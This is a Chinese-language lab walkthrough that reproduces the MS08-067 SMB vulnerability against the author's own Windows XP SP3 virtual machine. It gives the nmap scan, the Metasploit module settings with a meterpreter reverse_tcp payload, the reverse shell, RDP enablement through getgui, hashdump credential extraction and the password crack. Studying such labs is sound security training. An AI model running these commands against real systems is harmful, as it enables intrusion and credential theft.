MS08_067漏洞复现
MS08_067漏洞复现
一、环境准备:
首先第一步,MS08_067漏洞的环境仅存与Windows XP-SP2和3中,所以靶机准备我们需要在网址:https://msdn.itellyou.cn/ 内寻找到windows XP-SP3的系统,然后在VMware中选择镜像进行新建虚拟机。(我下的是windows XP-SP3所以后面以此为例)
第二步,在以上设置完成以后,在百度上面找到windows XP-SP3的激活码(网上有一大堆,多试试就可以),设置网络为”桥接模式”,进入界面。在”开始”中找到”控制面板”,右下角找到”安全中心”,在安全中心内关闭防火墙。重启后前期准备就完成了。
二、MS08_067漏洞复现:
首先在winXP-SP3中,使用”win+R”组合热键,然后输入cmd。开启命令行,输入”ipconfig”查看winXP-SP3的IP网段,然后在kali中找到”连接信息”。找到IP(kali攻击机)观察两个主机处于同一网段下——192.168.3的同一网段下。
然后,用nmap进行网段扫描,用的命令为”nmap -sV -n 192.168.3.38”是扫描发现445端口为开启状态。命令行中”-sV”表示”扫描系统版本及服务信息”,”-n”加快扫描进度。得到如下示意图。
接下来,打开msfconsole,开始进行攻击。
输入”search ms08_067”找到ms08_067攻击模块路径,exploit/windows/smb/ms08_067_netapi,使用命令行”use exploit/windows/smb/ms08_067_netapi”进行模块的使用。用命令”show options”来查询需要配置的模块参数,得到如下的参数。主要的配置参数为”RHOST”为”受害者IP”,”LHOST”为”攻击者IP”,”PAYLOAD”,”TARGET”。
接下来,我们配置这四个参数:”RHOST”用命令”set RHOST 192.168.3.38”;”PAYLOAD”用”set payload windows/meterpreter/reverse_tcp”;”TARGET”用命令”set target 34”;”LHOST”是自动配置的本机地址。
配置完成以后输入指令”run”,进行攻击。
得到如下反弹shell即使完成了攻击。接下来,我们打开他的远程端口——3389,使用命令”run getgui -e”开启3389端口,然后使用命令行”hashdump”跑出”受害者”的md5值。然后按两次tab打开终端换算密码得到密码”123456”,最后远程登陆,完成ms08_067复现。